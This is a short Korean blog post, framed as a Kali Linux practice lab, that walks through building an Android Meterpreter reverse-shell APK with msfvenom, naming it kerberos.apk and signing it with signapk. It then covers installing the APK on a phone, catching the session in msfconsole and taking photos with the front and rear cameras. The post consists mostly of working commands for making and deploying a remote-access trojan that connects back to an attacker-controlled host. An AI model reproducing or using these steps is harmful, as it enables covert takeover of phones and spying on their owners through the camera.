반응형
실습환경 : 칼리리눅스2.0
이용도구 : metasMetasploit, Signapk
1, 악성코드 생성
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.34 LPORT=4444 R > /root/바탕화면/kerberos.apk
2, signapk (sign하기)
java -jar signapk.jar certificate.pem key.pk8 (바뀔파일) (바뀐파일)
3, 바뀐파일을 폰으로 이동
4, handler파일 수정
5, msfconsole실행
msfconsole -r handler.rc
6, 폰에서 apk설치후 실행
7, 실행시에 sessions이 연결됨
8, sessions에 나와있는 세션으로 이동
ex) sessions -i 1
9, sysinfo로 apk사용중인 파일을 확인
10, help를 쳐서 사용할수 있는 프로그램을 확인한다.
11, 스냅샷
1번 후방카메라 webcam_snap -i 1
2번 전방카메라 webcam_snap -i 2
참고 : https://www.youtube.com/watch?v=X05OiaeAd14 (커버로스님 유튜브)
반응형
'보안' 카테고리의 다른 글
[Cain&Abel] MD5 복호화하기 (0) | 2018.12.26 |
---|
댓글